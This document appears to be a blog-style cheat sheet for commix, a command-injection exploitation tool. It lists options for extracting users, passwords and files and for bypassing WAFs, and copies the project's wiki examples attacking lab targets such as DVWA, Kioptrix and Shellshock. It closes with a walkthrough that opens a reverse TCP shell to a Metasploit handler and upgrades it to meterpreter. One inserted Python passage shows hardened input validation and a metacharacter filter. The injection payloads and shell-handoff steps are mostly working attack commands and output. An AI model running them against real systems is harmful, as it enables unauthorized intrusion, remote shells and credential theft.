commix

commix is an excellent automated command injection exploitation tool.

Common commands

# POST + COOKIE
commix -u "http://192.168.99.101/002/index.php?page=dns-lookup.php" --data "target_host=127.0.0.1|id&dns-lookup-php-submit-button=Lookup DNS" --cookie "showhints=1;username=admin; uid=1; PHPSESSID=a4e51899c9535d7f82f5eec85e445ebe"

# Use a request file, same as sqlmap
commix -r reqfile

# Crawler mode; set the crawl depth 1-2 (default 0)
commix --crawl=1

# Test via a sitemap
commix -x sitemap_url

# Add other HTTP headers
--host
--referer
--useragent
--random-agent # random User-Agent
--cookie

# Proxy
--proxy PROXY
--tor
--tor-port

# Options for when login authentication is required
--auth-url login URL
--auth-data login POST data
# HTTP authentication
--auth-type HTTP authentication type: 'BASIC' or 'Digest'
--auth-cred HTTP authentication credentials, e.g. 'admin:admin'

# Response status codes to ignore
--ignore-code 401
# Ignore redirects
--ignore-redirects

# Maximum number of retries on timeout
--retries

# Force SSL
--force-ssl

# Specify the character encoding
--encoding GBK

Recording test results

--output-dir

# Load a session from session_file (a .sqlite file)
-s SESSION_FILE

# Flush the session data for the target

--flush-session

# Ignore all results stored in session_file, i.e. this scan is independent of historical data
--ignore-session

Gathering system information

--all retrieve all of the information below
--current-user
--hostname
--is-root
--is-admin
--sys-info
--users
--passwords
--privileges
# PowerShell version
--ps-version

File operations

--file-read
--file-write
--file-upload
# Absolute path where a written or uploaded file is saved
--file-dest

Specifying test parameters

# Specify the parameter(s) to test
-p

# Skip the specified parameters
--skip

# Seconds to wait between HTTP requests
--delay

# Use an alternative os-shell, e.g. python
--alter-shell 'python'

# Specify a command to execute
--os-cmd id

# Specify the web root directory
--web-root /var/www

# Specify the tmp directory
--tmp-path /tmp

# Specify the target operating system
--os 'Windows' or 'Unix'

# Specify tamper scripts; can be used to bypass a WAF
--tamper

Skipping some tests

# Test level 1-3 (default 1)
--level

# Skip the math calculation checks
--skip-calc

# Skip testing parameters with empty values
--skip-empty

# Maximum number of failed injection attempts
--failed-tries 5

# Check for dependencies
--dependencies

# List all tamper scripts, similar to sqlmap tampers
--list-tampers

# Safely remove all commix data
--purge

# Skip WAF detection
--skip-waf

# Use a mobile User-Agent
--mobile

# Offline mode
--offline

# Wizard mode for beginners: an interactive mode that prompts for each option in turn
--wizard

# Disable colored output
--disable-coloring

Official examples

Usage Examples
Cat0x00 edited this page on 20 Mar 2019 · 26 revisions
1. Exploiting Damn Vulnerable Web App:
[email protected]:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
[email protected]:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
[email protected]:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence using ICMP exfiltration technique:
[email protected]:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting Persistence using an alternative (python) shell:
[email protected]:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting Kioptrix: Level 1.1 (#2):
[email protected]:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
[email protected]:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:
[email protected]:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:
[email protected]:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:
[email protected]:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:
[email protected]:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:
[email protected]:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:
[email protected]:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
[email protected]:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
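The POST + COOKIE command in the common commands block (`target_host=127.0.0.1|id`) and the DVWA and Mutillidae examples above all succeed for the same reason: the application hands a request parameter to a shell. The Python below is an added illustration that is not part of the original post or of commix itself; it shows the lookup handler written the vulnerable way beside a hardened version, and a check that flags request parameters carrying shell metacharacters, run over a few constructed request bodies shaped like the page's dns-lookup example (the function names and samples are the author's assumptions here).

```python
import re
from urllib.parse import parse_qsl

# RFC 1123 hostname labels; a dotted-quad IPv4 address also matches. This is the
# only shape a DNS-lookup form needs to accept.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Characters a command-injection payload needs to escape the intended command:
# separators, pipes, subshells, backticks, redirection and line breaks.
_SHELL_META = set(";|&$`<>(){}\n\r")

# Constructed sample request bodies in the shape of the page's dns-lookup example.
SAMPLE_REQUESTS = [
    "target_host=127.0.0.1&dns-lookup-php-submit-button=Lookup+DNS",
    "target_host=127.0.0.1|id&dns-lookup-php-submit-button=Lookup+DNS",
    "target_host=$(id)&dns-lookup-php-submit-button=Lookup+DNS",
]


def vulnerable_lookup_cmd(target_host: str) -> str:
    """The pattern commix exploits: the parameter is concatenated into a command
    line that is then run through a shell (e.g. subprocess.run(cmd, shell=True)),
    so '127.0.0.1|id' turns into 'nslookup 127.0.0.1|id' and 'id' executes."""
    return "nslookup " + target_host


def is_valid_host(target_host: str) -> bool:
    """Allow-list check: accept only hostnames / IPv4 literals, nothing else."""
    return _HOST_RE.match(target_host) is not None


def hardened_lookup_argv(target_host: str) -> list:
    """Validate, then build an argv list for subprocess.run(argv) with no shell.
    Without a shell the value is only ever nslookup's one positional argument."""
    if not is_valid_host(target_host):
        raise ValueError("rejected: not a hostname or IPv4 address")
    return ["nslookup", target_host]


def suspicious_params(query_string: str) -> dict:
    """Return {name: value} for every parameter whose value carries shell
    metacharacters; usable as a request filter or an access-log review check."""
    flagged = {}
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if _SHELL_META & set(value):
            flagged[name] = value
    return flagged
```

The allow-list check is the fix; the metacharacter filter is only a detection aid, since encodings and tamper scripts (the `--tamper` option above) exist precisely to slip past such filters.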

get metasploit shell

After a successful injection commix automatically obtains a pseudo-terminal, in os_shell mode by default; its display is a bit glitchy and it is not as convenient as metasploit.

The prerequisite is to pass --msf-path with the metasploit installation path; once the pseudo-terminal is obtained, hand off to metasploit with the following commands:

# Before running this, start the metasploit exploit/multi/handler
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.99.103:4444

# Reverse TCP shell; there is also a bind_tcp shell
commix(os_shell) > reverse_tcp

commix(os_shell) > set LHOST 192.168.99.103

commix(os_shell) > set LPORT 4444

---[ Unix-like reverse TCP shells ]---
Type '1' to use a PHP reverse TCP shell.
Type '2' to use a Perl reverse TCP shell.
Type '3' to use a Ruby reverse TCP shell.
Type '4' to use a Python reverse TCP shell.
Type '5' to use a Socat reverse TCP shell.
Type '6' to use a Bash reverse TCP shell.
Type '7' to use a Ncat reverse TCP shell.

---[ Windows reverse TCP shells ]---
Type '8' to use a PHP meterpreter reverse TCP shell.
Type '9' to use a Python reverse TCP shell.
Type '10' to use a Python meterpreter reverse TCP shell.
Type '11' to use a Windows meterpreter reverse TCP shell.
Type '12' to use the web delivery script.

# Start the callback
commix(reverse_tcp_other) > 4
[+] Everything is in place, cross your fingers and wait for a shell!

# The handler receives the shell
[*] Command shell session 1 opened (192.168.99.103:4444 -> 192.168.99.101:49036) at 2020-02-24 16:35:33 +0800

$ whoami
www-data

$ background

# Upgrade to meterpreter
msf5 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run

[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.99.103:4433
[*] Sending stage (985320 bytes) to 192.168.99.101
[*] Meterpreter session 2 opened (192.168.99.103:4433 -> 192.168.99.101:59582) at 2020-02-24 17:00:18 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 shell python/python /bin/sh: 0: can't access tty; job control turned off $ 192.168.99.103:4444 -> 192.168.99.101:49036 (192.168.99.101)
2 meterpreter x86/linux uid=33, gid=33, euid=33, egid=33 @ 192.168.99.101 192.168.99.103:4433 -> 192.168.99.101:59582 (192.168.99.101)